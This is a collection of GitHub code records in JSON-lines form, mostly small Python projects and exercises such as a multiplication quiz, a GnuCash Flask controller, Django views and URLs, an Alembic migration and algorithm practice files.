depth to disparity used in the paper \"Learning an event sequence embedding for dense event-based\n deep stereo\" (ICCV 2019)\n\n Original code available at https://github.com/tlkvstepan/event_stereo_ICCV2019\n \"\"\"\n disparity_maps = DISPARITY_MULTIPLIER * FOCAL_LENGTH_X_BASELINE['indoor_flying'] / (depth_maps + 1e-15)\n return disparity_maps\n\n\ndef disparity_to_depth(disparity_map):\n depth_map = DISPARITY_MULTIPLIER * FOCAL_LENGTH_X_BASELINE['indoor_flying'] / (disparity_map + 1e-7)\n return depth_map\n\n\nif __name__ == '__main__':\n test(args)\n","repo_name":"Huobozun/ASNet","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"72324128584","text":"# multiplication_quiz.py - A program that 
asks a number of multiplication\n# questions with a timer and allows 3 tries. There are 10 questions for\n# each quiz.\n\nimport random\nimport time\nimport sys\n\nprint(\"\"\"\\n----------------------------------------------------------------------\nAttention! This quiz gives you a 10-second time-limit for each\nquestion. If you exceed it, your attempt will be considered wrong.\nAlso, you get 3 tries for each question. Good luck!\n----------------------------------------------------------------------\"\"\")\n\nstart_game = input(\"\\nWould you like to start? (yes/no): \").lower().strip()\nif start_game != \"yes\" and start_game != 'y':\n sys.exit() # Exit quiz if user does not choose 'yes'/'y'\n\nnumber_of_questions = 10 # Number of questions to be given\ncorrect_answers = 0 # Used to display user score at the end of quiz\n\nfor question_number in range(number_of_questions):\n tries = 0\n num1 = random.randint(0, 24)\n num2 = random.randint(0, 24)\n\n while tries < 3:\n print(f\"\\n{question_number + 1}) What is {num1} x {num2}?\")\n start = time.monotonic()\n response = int(input(\"Answer: \"))\n end = time.monotonic()\n\n time_elapsed = end - start\n\n if time_elapsed > 10:\n print(\"Exceeded 10 second limit. No point awarded.\")\n print(f\"The correct answer is {num1 * num2}.\")\n time.sleep(2)\n break\n\n if response == num1 * num2:\n print(\"Correct!\")\n correct_answers += 1\n time.sleep(2)\n break\n\n elif response != num1 * num2:\n tries += 1\n if tries == 3:\n print(\"Incorrect. You reached 3 tries. No point awarded.\")\n print(f\"The correct answer is {num1 * num2}.\")\n time.sleep(2)\n break\n\n print(f\"Incorrect. Try again. You have {3 - tries} tries left.\")\n time.sleep(2)\n continue\n\nprint(f\"\\nYour score is {correct_answers}/{number_of_questions}.\")\n\n# Personalised messages for a certain score out of 10.\nif correct_answers == 0:\n print(\"You are possibly the dumbest person alive.\")\nelif 0 < correct_answers <= 3:\n print(\"You got a lot of practicing to do.\")\nelif 3 < correct_answers <= 6:\n print(\"Not bad I guess. Still can do better.\")\nelif 6 < correct_answers <= 8:\n print(\"That's quite good!\")\nelif correct_answers == 9:\n print(\"Almost had it! That's a wonderful mark.\")\nelse:\n print(\"Perfection.\")\n","repo_name":"frazebean/automate_the_boring_stuff","sub_path":"math_quiz.py","file_name":"math_quiz.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1320221990","text":"def canPartition(nums):\n\ttarget, n = sum(nums), len(nums)\n\tif target & 1: return False\n\ttarget >>= 1\n\tdp = [True] + [False]*target\n\tfor x in nums:\n\t\tdp = [dp[s] or (s >= x and dp[s-x]) for s in range(target+1)]\n\t\tif dp[target]: return True\n\treturn False\n\nif __name__ == '__main__':\n\n nums = [1,5,11,5]\n print(canPartition(nums))","repo_name":"garcha-amanjot-au28/fprt-deployment","sub_path":"coding-challenges/week14/day03/equal_subset.py","file_name":"equal_subset.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16721077068","text":"\"\"\"\n2.2[12]: Петя и Катя – брат и сестра. Петя – студент, а Катя – школьница. Петя помогает Кате по математике. Он задумывает два\nнатуральных числа X и Y (X,Y≤1000), а Катя должна их отгадать.\nДля этого Петя делает две подсказки. Он называет сумму этих чисел S и их произведение P. 
Помогите Кате отгадать задуманные Петей числа.\n\nПримеры/Тесты:\n4 4 -> 2 2\n5 6 -> 2 3\n\nПримечание.\nЗдесь нужно составить два уравнения. Которые приведут к квадратному уравнению.\nКто не помнит, как решать квадратное уравнение - посмотрите в сети. Обойдите дополнительной проверкой возможность комплексных решений.\nМожно игнорировать то, что получаться рациональные решения вместо натуральных.\n\nДля вычисления квадратного корня используйте возведение в степень 0.5 или (*) Усложнение. найдите самостоятельно в сети какая функция\nстандартной библиотеки вычисляет квадратный корень и как до нее добраться.\n\"\"\"\n\n# Инструкция постороения и решения квадратичного уравнения на примере нашей задачи:\n\n# на пример х = 5, а у = 3\n\n# s = x + y Сумма равна 8\n# p = x * y Произведение равно 15\n# x = s - y\n# x = p / y\n# s - y = p / y\n# 8 - y = 15 / y\n# (8 - y)y = 15\n# 8y - y2 = 15\n# -y2 + 8y = 15 [*-1 = next_str]\n# y2 - 8y = -15\n# y2 - 8y + 15 = 0\n\n### D = b2 - 4ac\n# D = 64 - 4 * 1 * 15\n# D = 4\n\n### if D > 0 --->>> x1 and x2, ну в этом случае y1 and y2\n### if D == 0 --->>> x1 = x2 = x, ну в этом случае y, то есть ур-е имеет 1 решение(корень, то есть x or y)\n### if D < 0 --->>> нет решения, то есть невозможно найти значение x(в этом случае y), почему хз\n\n### x1 = (-b + sq(D)) / 2a\n### x2 = (-b - sq(D)) / 2a\n\n# x1 = (8 + 2) / 2 = 5 то есть x или y = 5\n# x2 = (8 - 2) / 2 = 3 то есть x или y = 3\n\n\nxV = int(input('Введите число X от 0 до 1000: ')) # 5\nyV = int(input('Введите число Y от 0 до 1000: ')) # 3\n\ns = xV + yV # 8\np = xV * yV # 15\n\ndiscrim = (s * s) - 4 * p\ndisSqr = discrim ** (0.5)\n\nif discrim > 0:\n x = (s + disSqr) / 2\n y = (s - disSqr) / 2\nelif discrim == 0:\n x = s / 2\n y = x\n\nprint(f'Вы ввели X = {xV}')\nprint(f'Вы ввели Y = {yV}')\nprint(f'Сумма введённых чисел = {s}')\nprint(f'Произведение введённых чисел = {p}')\nprint('')\nprint(f'Катя отгадала X и Y = {int(x)} и {int(y)} или наоборот')\nprint('')\n","repo_name":"G-Relaxant/PythonSeminarsAndHomework","sub_path":"Seminar2/Homework/Task_2.2[12].py","file_name":"Task_2.2[12].py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6431334964","text":"import tkinter as tk\nfrom tkinter import ttk\n\nimport src.constants as cst\n\n\nclass ViewModeVPC:\n def __init__(self, master:tk.Widget):\n\n # Variables\n self.var_peep = tk.IntVar(master)\n self.var_p_support = tk.IntVar(master)\n self.var_ti = tk.DoubleVar(master)\n self.var_br = tk.IntVar(master)\n self.var_trigger = tk.DoubleVar(master)\n\n # Elements\n self.peep_label = ttk.Label(master, text=\"PEP\", width=cst.W_LABEL)\n self.peep_spin = ttk.Spinbox(master, textvariable=self.var_peep, width=cst.W_SPINBOX)\n self.peep_unit = ttk.Label(master, text=\"cmH2O\", width=cst.W_UNIT)\n self.p_support_label = ttk.Label(master, text=\"Psupport\", width=cst.W_LABEL)\n self.p_support_spin = ttk.Spinbox(master, textvariable=self.var_p_support, width=cst.W_SPINBOX)\n self.p_support_unit = ttk.Label(master, text=\"cmH2O\", width=cst.W_UNIT)\n self.ti_label = ttk.Label(master, text=\"Temps inspi\", width=cst.W_LABEL)\n self.ti_spin = ttk.Spinbox(master, textvariable=self.var_ti, width=cst.W_SPINBOX)\n self.ti_unit = ttk.Label(master, text=\"s\", width=cst.W_UNIT)\n self.br_label = ttk.Label(master, text=\"Fréquence respi\", width=cst.W_LABEL)\n self.br_spin = ttk.Spinbox(master, textvariable=self.var_br, width=cst.W_SPINBOX)\n self.br_unit = ttk.Label(master, 
text=\"/min\", width=cst.W_UNIT)\n self.trigger_label = ttk.Label(master, text=\"Trigger\", width=cst.W_LABEL)\n self.trigger_spin = ttk.Spinbox(master, textvariable=self.var_trigger, width=cst.W_SPINBOX)\n self.trigger_unit = ttk.Label(master, text=\"l/min\", width=cst.W_UNIT)\n\n # Place the elements\n self.peep_label.grid(row=0, column=0)\n self.peep_spin.grid(row=0, column=1)\n self.peep_unit.grid(row=0, column=2, padx=(5, 0))\n self.p_support_label.grid(row=1, column=0)\n self.p_support_spin.grid(row=1, column=1)\n self.p_support_unit.grid(row=1, column=2, padx=(5, 0))\n self.ti_label.grid(row=2, column=0)\n self.ti_spin.grid(row=2, column=1)\n self.ti_unit.grid(row=2, column=2, padx=(5, 0))\n self.br_label.grid(row=3, column=0)\n self.br_spin.grid(row=3, column=1)\n self.br_unit.grid(row=3, column=2, padx=(5, 0))\n self.trigger_label.grid(row=4, column=0)\n self.trigger_spin.grid(row=4, column=1)\n self.trigger_unit.grid(row=4, column=2, padx=(5, 0))\n","repo_name":"deplanty/virtual-respirator","sub_path":"src/frames/views/modes/vpc.py","file_name":"vpc.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"7437220119","text":"\"\"\"\nAccount operations\n- search\n- editing of metadata (?)\n- list of transactions / register -> see transaction controller\n\"\"\"\ntry:\n import simplejson as json\nexcept ImportError:\n import json\nimport logging\n\nfrom flask import Blueprint, render_template, request\n\nfrom gnucash_portfolio_webui.models.account_models import (AccountDetailsViewModel,\n AccountTransactionsInputModel,\n AccountTransactionsRefModel,\n AccountTransactionsViewModel)\nfrom gnucash_portfolio.accounts import AccountsAggregate\nfrom gnucash_portfolio.bookaggregate import BookAggregate\nfrom gnucash_portfolio.currencies import CommodityTypes\nfrom gnucash_portfolio.lib import datetimeutils, generic\nfrom piecash import Account, Split, Transaction\n\naccount_controller = Blueprint( # pylint: disable=invalid-name\n 'account_controller', __name__, url_prefix='/account')\n\n\n@account_controller.route('/')\ndef index():\n \"\"\" root page \"\"\"\n return render_template('account.html')\n\n\n@account_controller.route('/favourites')\ndef favourites():\n \"\"\" Favourite accounts \"\"\"\n with BookAggregate() as svc:\n model = __load_favourite_accounts_model(svc)\n\n return render_template('account.favourites.html', model=model)\n\n\n@account_controller.route('/list')\ndef all_accounts():\n \"\"\" Displays all book accounts \"\"\"\n with BookAggregate() as svc:\n accounts = svc.accounts.get_all()\n # Sort by full name.\n accounts.sort(key=lambda x: x.fullname)\n\n model = {\"accounts\": accounts}\n return render_template('account.list.html', model=model)\n\n\n@account_controller.route('/search')\ndef search():\n \"\"\" Search for an account by typing in a part of the name \"\"\"\n return render_template('account.search.html')\n\n\n@account_controller.route(\"/find\")\ndef find():\n \"\"\"\n Search for an account with the given text in the name.\n Returns JSON result. Used for datatables.\n \"\"\"\n term = request.args.get(\"search[value]\")\n model_array = []\n\n # Ignore empty requests\n if term:\n # Search in any part of the name\n term = '%' + term + '%'\n # search\n model_array = __load_search_model(term)\n\n # data-table expected formatting. 
Unless I find a way to customize the client-side.\n model = {\n \"data\": model_array,\n \"records_total\": len(model_array)\n }\n json_output = json.dumps(model)\n return json_output\n\n\n@account_controller.route('/cash')\ndef cash_balances():\n \"\"\" Investment cash balances \"\"\"\n account_names = request.form.get(\"accounts\")\n account_names = account_names if account_names else \"Assets:Investments\"\n model = {\n \"accounts\": account_names,\n \"data\": []\n }\n # Selection of accounts. Display the default values the first time.\n with BookAggregate() as book_svc:\n accts_svc = AccountsAggregate(book_svc.book)\n acct = accts_svc.get_by_fullname(account_names)\n acct_svc = accts_svc.get_account_aggregate(acct)\n model[\"data\"] = acct_svc.load_cash_balances_with_children(\n account_names)\n # Display the report\n return render_template('account.cash.html', model=model)\n\n\n@account_controller.route('/splits', methods=['GET'])\ndef transactions():\n \"\"\" Account transactions \"\"\"\n with BookAggregate() as svc:\n in_model = model = AccountTransactionsInputModel()\n\n reference = __load_ref_model_for_tx(svc)\n\n # Check if any parameters were passed already\n account_fullname = request.args.get('acct_name')\n if account_fullname:\n acct = svc.accounts.get_by_fullname(account_fullname)\n in_model.account_id = acct.guid\n\n model = __load_view_model_for_tx(svc, in_model)\n\n return render_template(\n 'account.transactions.html',\n model=model, input_model=in_model, reference=reference)\n\n\n@account_controller.route('/splits', methods=['POST'])\ndef transactions_post():\n \"\"\" Account transactions \"\"\"\n input_model = __get_input_model_for_tx()\n return account_splits(input_model.account_id)\n\n\n@account_controller.route('//details')\ndef account_details(acct_id):\n \"\"\" Displays account details \"\"\"\n with BookAggregate() as svc:\n model = __load_account_details_model(svc, acct_id)\n\n return render_template('account.details.html', model=model)\n\n\n@account_controller.route('//splits')\ndef account_splits(acct_id: str):\n \"\"\" Displays account transactions with splits in period \"\"\"\n input_model = __get_input_model_for_tx()\n input_model.account_id = acct_id\n\n with BookAggregate() as svc:\n reference = __load_ref_model_for_tx(svc)\n model = __load_view_model_for_tx(svc, input_model)\n\n return render_template(\n 'account.transactions.html',\n model=model, input_model=input_model, reference=reference)\n\n\n@account_controller.route('/transactions')\ndef account_transactions():\n \"\"\" Lists only transactions \"\"\"\n account_id = request.args.get(\"accountId\")\n model = {\n \"account_id\": account_id\n }\n return render_template('account.transactions.vue.html', model=model)\n\n\n@account_controller.route('/details/')\ndef details(fullname):\n \"\"\" Displays account details \"\"\"\n with BookAggregate() as svc:\n account = svc.accounts.get_by_fullname(fullname)\n\n model = __load_account_details_model(svc, account.guid)\n\n return render_template('account.details.html', model=model)\n\n\n#############\n# Partials\n\n@account_controller.route('/partial/favourites')\ndef api_favourites():\n \"\"\" list of favourite accounts with balances \"\"\"\n with BookAggregate() as svc:\n model = __load_favourite_accounts_model(svc)\n\n return render_template('_account.favourites.html', model=model)\n\n\n#################\n# API section\n\n@account_controller.route('/api/search')\ndef search_api():\n \"\"\" searches for account by name and returns the json list of results 
\"\"\"\n term = request.args.get('query')\n with BookAggregate() as svc:\n accounts = svc.accounts.find_by_name(term)\n # result = json.dumps(accounts)\n model_list = [{\"name\": account.fullname, \"id\": account.guid}\n for account in accounts]\n model_list.sort(key=lambda x: x[\"name\"])\n\n result_dict = {\"suggestions\": model_list}\n result = json.dumps(result_dict)\n return result\n\n\n@account_controller.route('/api/search_autocomplete')\ndef api_search_autocomplete():\n \"\"\" format the output for autocomplete. Client-side customization does not work\n for some reason. \"\"\"\n term = request.args.get('query')\n with BookAggregate() as svc:\n accounts = svc.accounts.find_by_name(term)\n # result = json.dumps(accounts)\n model_list = [{\"value\": account.fullname, \"data\": account.guid}\n for account in accounts]\n model_list.sort(key=lambda x: x[\"value\"])\n\n result_dict = {\"suggestions\": model_list}\n result = json.dumps(result_dict)\n return result\n\n\n@account_controller.route('/api/transactions')\ndef api_transactions():\n \"\"\" Returns account transactions \"\"\"\n from pydatum import Datum\n\n # get parameters\n dateFromStr = request.args.get(\"dateFrom\")\n dateFrom = Datum()\n dateFrom.from_iso_date_string(dateFromStr)\n dateToStr = request.args.get(\"dateTo\")\n dateTo = Datum()\n dateTo.from_iso_date_string(dateToStr)\n account_id = request.args.get(\"account\")\n\n # get data\n with BookAggregate() as svc:\n acc_agg = svc.accounts.get_aggregate_by_id(account_id)\n txs = acc_agg.get_transactions(dateFrom.value, dateTo.value)\n records = []\n\n # return results\n model = {\n \"accountName\": acc_agg.account.fullname,\n \"startBalance\": acc_agg.get_start_balance(dateFrom.value),\n \"endBalance\": acc_agg.get_end_balance(dateTo.value),\n \"transactions\": []\n }\n\n for tx in txs:\n # this_split = [split for split in tx.splits if split.transaction == tx][0]\n # this_split = tx.splits.filter(Split.account_guid == account_id).one()\n tx_agg = svc.transactions.get_aggregate(tx)\n value = tx_agg.get_value_of_splits_for_account(account_id)\n quantity = tx_agg.get_quantity_of_splits_for_account(account_id)\n\n records.append({\n \"id\": tx.guid,\n \"date\": tx.post_date.strftime(\"%Y-%m-%d\"),\n \"description\": tx.description,\n \"notes\": tx.notes,\n \"value\": value,\n \"quantity\": quantity\n })\n model[\"transactions\"] = records\n\n result = json.dumps(model)\n return result\n\n\n######################\n# Private\n\ndef __get_input_model_for_tx() -> AccountTransactionsInputModel:\n \"\"\" Parse user input or create a blank input model \"\"\"\n model = AccountTransactionsInputModel()\n\n if request.args:\n # model.account_id = request.args.get('account')\n model.period = request.args.get('period')\n\n if request.form:\n # read from request\n model.account_id = request.form.get('account')\n model.period = request.form.get('period')\n\n return model\n\n\ndef __load_ref_model_for_tx(svc: BookAggregate):\n \"\"\" Load reference model \"\"\"\n model = AccountTransactionsRefModel()\n\n root_acct = svc.accounts.get_by_fullname(\"Assets\")\n model.accounts = (\n svc.accounts.get_account_aggregate(root_acct)\n .get_all_child_accounts_as_array()\n )\n\n return model\n\n\ndef __load_view_model_for_tx(\n svc: BookAggregate,\n input_model: AccountTransactionsInputModel\n) -> AccountTransactionsViewModel():\n \"\"\" Loads the filtered data \"\"\"\n assert isinstance(input_model.period, str)\n\n model = AccountTransactionsViewModel()\n if not input_model.account_id:\n return 
model\n\n # Load data\n\n # parse periods\n period = datetimeutils.parse_period(input_model.period)\n\n date_from = period[0]\n date_to = period[1]\n logging.debug(f\"got range: {input_model.period}. Parsed to {date_from} - {date_to}\")\n\n account = svc.accounts.get_by_id(input_model.account_id)\n model.start_balance = svc.accounts.get_account_aggregate(\n account).get_start_balance(date_from)\n model.end_balance = svc.accounts.get_account_aggregate(\n account).get_end_balance(date_to)\n\n query = (\n svc.book.session.query(Split)\n .join(Transaction)\n .filter(Split.account_guid == input_model.account_id)\n .filter(Transaction.post_date >= date_from.date())\n .filter(Transaction.post_date <= date_to.date())\n .order_by(Transaction.post_date)\n )\n model.splits = query.all()\n\n return model\n\n\ndef __load_search_model(search_term):\n \"\"\" Loads the data and returns an array of model objects\"\"\"\n model_array = []\n\n with BookAggregate() as svc:\n records = (\n svc.book.session.query(Account)\n .filter(Account.name.like(search_term))\n .all())\n\n for account in records:\n account_model = {\n \"name\": account.name,\n \"fullname\": account.fullname\n }\n model_array.append(account_model)\n\n return model_array\n\n\ndef __load_account_details_model(svc: BookAggregate, acct_id: str) -> AccountDetailsViewModel:\n \"\"\" Loads account details view model \"\"\"\n agg = svc.accounts.get_aggregate_by_id(acct_id)\n\n model = AccountDetailsViewModel()\n model.account = agg.account\n model.quantity = agg.get_balance()\n if agg.account.commodity.namespace != CommodityTypes.CURRENCY.name:\n model.security_details_url = \"/security/details/\" + agg.account.commodity.mnemonic\n\n return model\n\n\ndef __load_favourite_accounts_model(svc: BookAggregate):\n \"\"\" Loads the view model with favourite accounts information \"\"\"\n #accounts = svc.accounts.get_list(favourite_accts)\n accounts = svc.accounts.get_favourite_accounts()\n # sort by name\n accounts.sort(key=lambda acc: acc.name)\n\n model = {\n \"accounts\": accounts\n }\n return model\n","repo_name":"alensiljak/gnucash-portfolio-webui","sub_path":"gnucash_portfolio_webui/controllers/account_controller.py","file_name":"account_controller.py","file_ext":"py","file_size_in_byte":12252,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"12242264805","text":"import pandas as pd\nimport pickle\n\ndef predict(X_test):\n # load the model and the pipeline\n with open('model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n with open('pipeline.pkl', 'rb') as f:\n pipeline = pickle.load(f)\n\n predictions = pd.DataFrame(model.predict(pipeline.transform(X_test)), columns=['LeaveOrNot'],\n index=X_test.index)\n return predictions\n\ndef main():\n # read X_test\n X_test = pd.read_csv('X_test.csv', index_col=0)\n predictions = predict(X_test)\n predictions['LeaveOrNot'].to_json('y_test_pred.json')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndroZa0812/NayaProject4","sub_path":"execute_model.py","file_name":"execute_model.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35431079028","text":"\"\"\"\nGets a positive integer from a user.\n\nDemonstrates main.\n\"\"\"\n\n\ndef main():\n i = get_revenue()\n print(f\"${r}\")\n\n\ndef get_revenue():\n while True:\n n = int(input(\"Revenue: \"))\n if n >= 0:\n return n\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"hbap/python1","sub_path":"positive.py","file_name":"positive.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"14581607167","text":"from django.conf import settings\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom django.template.loader import get_template\nfrom django.core.mail import send_mail, EmailMultiAlternatives\n# Same App importing\nfrom food_newsletters.models import NewsLetterUsers\nfrom food_newsletters.forms import NewsLetterUsersSignUpForm\n\n\ndef newsletter_subscribe(request):\n \"\"\"Subscription\"\"\"\n form = NewsLetterUsersSignUpForm()\n if request.method == 'POST':\n print('working')\n email = request.POST['email']\n try:\n NewsLetterUsers.objects.create(email=email)\n messages.success(request, 'Email has been submitted!',\n 'alert alert-success alert-dismissible')\n subject = 'Thank you for joining my Newsletter!'\n from_email = settings.EMAIL_HOST_USER\n to_email = [email]\n\n with open(settings.BASE_DIR + '/templates/food_newsletters/subscribe_email_message.txt') as f:\n signup_message = f.read()\n message = EmailMultiAlternatives(subject=subject, body=signup_message,\n from_email=from_email, to=to_email)\n html_template = get_template('food_newsletters/subscribe_email_message.html').render()\n message.attach_alternative(html_template, 'text/html')\n message.send()\n except:\n messages.warning(request, 'Email already exists!', 'alert alert-warning alert-dismissible')\n\n context = {'form': form}\n template = 'food_newsletters/subscribe.html'\n return render(request, template, context)\n # return redirect('/home/')\n\n\ndef newsletter_unsubscribe(request):\n \"\"\"Un-subscription\"\"\"\n form = NewsLetterUsersSignUpForm(request.POST or None)\n\n if request.method == 'POST':\n email = request.POST['email']\n if NewsLetterUsers.objects.filter(email=email).exists():\n instance = NewsLetterUsers.objects.filter(email=email)\n instance.delete()\n messages.success(request, 'Email has been removed!',\n 'alert alert-success alert-dismissible')\n subject = 'You have been Unsubscribed!'\n from_email = settings.EMAIL_HOST_USER\n to_email = [email]\n\n with open(settings.BASE_DIR + '/templates/food_newsletters/unsubscribe_email_message.txt') as f:\n signup_message = f.read()\n message = EmailMultiAlternatives(subject=subject, body=signup_message,\n from_email=from_email, to=to_email)\n html_template = get_template('food_newsletters/unsubscribe_email_message.html').render()\n message.attach_alternative(html_template, 'text/html')\n message.send()\n\n else:\n messages.warning(request, 'Email is not in the Database!',\n 'alert alert-warning alert-dismissible')\n\n context = {'form': form}\n template = 'food_newsletters/unsubscribe.html'\n return render(request, template)\n\n","repo_name":"siyam04/food-service-c2c-django","sub_path":"food_newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"72657946185","text":"#!/usr/bin/python3\nimport sys\n\n\ndef main():\n n = len(sys.argv) - 1\n cont = 0\n print(\"{:d} argument\".format(n) + (\":\" if n == 1 else \"s\"), end=\"\")\n if n == 0:\n print(\".\", end=\"\")\n print(\":\" if n > 1 else \"\")\n while cont < n:\n if n > 0:\n print(\"{:d}: {}\".format(cont + 1, sys.argv[cont + 1]))\n cont += 1\nif __name__ == 
\"__main__\":\n main()\n","repo_name":"cristian0497/High-Level-Programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17615733400","text":"\"\"\"empty message\n\nRevision ID: d26c98f417da\nRevises: a24d4e0bf8aa\nCreate Date: 2021-12-02 15:18:21.863916\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd26c98f417da'\ndown_revision = 'a24d4e0bf8aa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index('anomaly_data_output_query_idx', 'anomaly_data_output', ['kpi_id', 'anomaly_type', 'series_type', 'data_datetime'], unique=False)\n op.create_index('rca_data_query_idx', 'rca_data', ['kpi_id', 'data_type', 'end_date'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('rca_data_query_idx', table_name='rca_data')\n op.drop_index('anomaly_data_output_query_idx', table_name='anomaly_data_output')\n # ### end Alembic commands ###\n","repo_name":"chaos-genius/chaos_genius","sub_path":"migrations/versions/d26c98f417da_.py","file_name":"d26c98f417da_.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":651,"dataset":"github-code","pt":"81"} +{"seq_id":"74895998026","text":"# Un programa que imprima en pantalla la sucesion de fibonacci preguntando\n# el valor maximo al usuario.\nimport os\n\n\ndef Fibonacci_numbers():\n os.system(\"cls\")\n print(\"\\nExercise with fibonacci numbers\")\n\n def fibonacci(n):\n a = 0\n b = 1\n fib = []\n\n if a < n:\n fib.append(a)\n if b < n:\n fib.append(b)\n\n for k in range(n):\n c = a + b\n a = b\n b = c\n\n if b < n:\n fib.append(b)\n\n return print(fib)\n\n fibonacci(int(input(\"up to what value do you want to indent: \")))\n print(\"\\nEnd of program\\n\")\n\n\nif __name__ == \"__main__\":\n Fibonacci_numbers()\n","repo_name":"MiguelImparable/Pruebas-en-python","sub_path":"package/Fibonacci_numbers.py","file_name":"Fibonacci_numbers.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15207414062","text":"def twoSum(nums, target):# Exceed time limit\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n index_list = list(range(len(nums)))\n while index_list:\n base = [index_list.pop(0)] #base = [0], base = [1], base = [2] ...\n print(base)\n base2 = list(set(index_list)-set(base)) #base2 = [1,2,3]\n print(\"base2\")\n print(base2)\n while base2:\n sub = base + [base2.pop(0)] # [0,1] base2 = [2,3]\n print(\"sub\")\n print(sub)\n print(nums[sub[0]]+nums[sub[1]])\n if nums[sub[0]]+nums[sub[1]] == target:\n return sub\nprint(twoSum([3,2,3],5))\n\ndef twoSum1(nums, target):# O(N) = 1\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n index_list = list(range(len(nums)))\n d = {}\n for i in index_list:\n if target-nums[i] in d:\n return [i,d[target-nums[i]]]\n else:\n d[nums[i]] = 
i\nprint(twoSum1([3,2,3],5))\n","repo_name":"Adonais0/Leetcode_Solutions","sub_path":"leetcode_two_sums.py","file_name":"leetcode_two_sums.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6903943580","text":"def number_of_games(rounds,players):\n if rounds == 0:\n return 0\n if len(players) == 2:\n return all(players)\n games = [players[i:i+2] for i in range(0,len(players)-1,2)]\n next_players = list(map(any,games))\n games_played = sum(map(all,games))+number_of_games(rounds-1, next_players)\n return games_played\n\ntest_cases = [(2,[1,1,1,1]), (1,[1,1,1,1]), (2,[0,1,1,0]), (2, [1,0,1,0,1,0,1,0])]\nfor case in test_cases:\n print(number_of_games(*case))\n \n\n\n","repo_name":"JaviMaligno/Las12uvas2022","sub_path":"10. Toreno de pádel/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2786067550","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nadmin.autodiscover()\n\nurlpatterns = patterns('web.views',\n url(r'^$', 'home', name='home'),\n url(r'^about/$', 'about'),\n url(r'^awards/$', 'awards'),\n url(r'^candidates/$', 'candidates'),\n url(r'^contact/$', 'officers'),\n url(r'^emcc/$', 'emcc'),\n url(r'^fe/$', 'fe'),\n url(r'^programs/$', 'programs'),\n url(r'^requirements/$', 'requirements'),\n url(r'^tutoring/$', 'tutoring'),\n\n url(r'^donate/$', 'donate'),\n url(r'^sponsor/$', 'sponsor'),\n url(r'^officers/$', 'officers'),\n url(r'^faculty/$', 'faculty'),\n url(r'^calendar/$', 'room_calendar'),\n)\n\nurlpatterns += patterns('main.views',\n url(r'^tutoring_admin/$', 'tutoring_admin'),\n url(r'^houses/$', 'houses'),\n\n url(r'^profile_requirements/$', 'requirements_view'),\n url(r'^candidate_requirements/$', 'candidates'),\n url(r'^pending_community_service/$', 'pending_community_service'),\n url(r'^active_members/$', 'active_members'),\n url(r'^downloads/$', 'downloads'),\n\n # url(r'^spreadsheet/$', 'spreadsheet'),\n url(r'^all_profiles/$', 'all_profiles'),\n url(r'^resumes_pdf/$', 'resumes_pdf'),\n url(r'^resumes_word/$', 'resumes_word'),\n\n url(r'^logout/$', 'logout'),\n url(r'^login/$', 'login'),\n url(r'^password_reset/$', 'password_reset'),\n url(r'^password_reset_done/$', 'password_reset_done'),\n url(r'^password_reset_confirm/(?P[0-9A-Za-z]+)-(?P.+)/$', 'password_reset_confirm'),\n url(r'^password_reset_complete/$', 'password_reset_complete'),\n url(r'^profile/$', 'profile_view'),\n url(r'^edit/$', 'edit'),\n url(r'^add/$', 'add'),\n url(r'^register/$', 'register'),\n url(r'^account/$', 'account'),\n url(r'^upload/$', 'upload'),\n url(r'^testbank/$', 'testbank'),\n url(r'^testbank/file/(?P\\d+)/(?P.*)$', 'test_file'),\n url(r'^testbank/file/(?P\\d+)$', 'test_file'),\n url(r'^uploadreviewsheet/$', 'upload_review_sheet'),\n url(r'^reviewsheets/$','reviewsheetbank'),\n 